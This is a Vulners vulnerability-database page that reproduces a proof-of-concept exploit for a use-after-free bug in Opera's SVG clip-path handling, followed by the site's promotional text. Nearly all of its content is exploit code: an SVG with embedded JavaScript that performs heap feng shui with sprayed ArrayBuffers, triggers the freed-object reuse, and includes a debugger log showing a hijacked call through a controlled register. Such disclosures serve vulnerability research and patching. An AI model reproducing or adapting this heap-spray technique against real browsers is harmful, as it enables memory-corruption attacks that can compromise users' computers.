Vulners
Lucene search
Opera SVG Use After Free Vulnerability
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w0.org/1999/xlink">
<g id="group">
<defs>
<clipPath id="clip-circle" clip-path="url(#clip-rect)">
</clipPath>
<clipPath id="clip-rect">
</clipPath>
</defs>
<circle id="rect" x="10" y="10" width="100" height="100" fill="green" />
</g>
<script><![CDATA[
//Author=Cons0ul
var b = new Array();
// this is our spray function where spray is allocated on LFH with exact size 0x78
// so 0x78 size of block is created so far we are creating 0x50000 blocks
// to create 0x78 blocks we are using ArrayBuffer();
function feng_shui(){
for(i=0;i<1000;i++)window.opera.collect(); // <----- garbage collection
for(i=0;i<0x50000;i++){
payload = new ArrayBuffer(0x78) // use 0xb0 for 64bit machine
payload[0]=0x6c
payload[1]=0x03
payload[2]=0xfe
payload[3]=0x7f
b.push(payload)
}
}
// bug is use after free in handling of (use tag + clippath) witch try to access freed object
//
document.getElementById('rect').setAttribute('clip-path',"url(#clip-circle)");
var c = document.createElement('use');
c.setAttribute("xlink:href","rect")
feng_shui();
document.getElementById('clip-rect').appendChild(c);
document.getElementById('rect').style.clipPath="url(#clip-circle)" // <----- bug
window.opera.collect() // <------ gc() frees the allocation
feng_shui(); // <------------ we allocate our code at freed memory
// at the end it tries freed block witch contains our data
window.location.href=window.location.href;
/*
idc !heap -p -a ecx
address 077c45e0 found in
_HEAP @ b40000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
077c45d8 0010 0000 [00] 077c45e0 00078 - (free)
PS C:\Users\cons0ul> idc db ecx
077c45e0 92 48 fe 7f 00 00 00 00-00 00 00 00 00 00 00 00 .H..............
077c45f0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
077c4600 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
077c4610 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
077c4620 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
077c4630 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
077c4640 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
077c4650 00 00 00 00 00 00 00 00-89 d0 6a 5b 00 00 00 88 ..........j[....
PS C:\Users\cons0ul> idc r
eax=7ffe4892 ebx=00000001 ecx=077c45e0 edx=00000000 esi=0372e590 edi=01d40048
eip=6b8c998b esp=0013e334 ebp=00000000 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
Opera_6b430000!OpGetNextUninstallFile+0xf8583:
6b8c998b ff5008 call dword ptr [eax+8] ds:0023:7ffe489a=????????
*/
]]></script>
</svg>
# 0day.today [2018-01-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Feb 2013 00:00Current
7High risk
Vulners AI Score7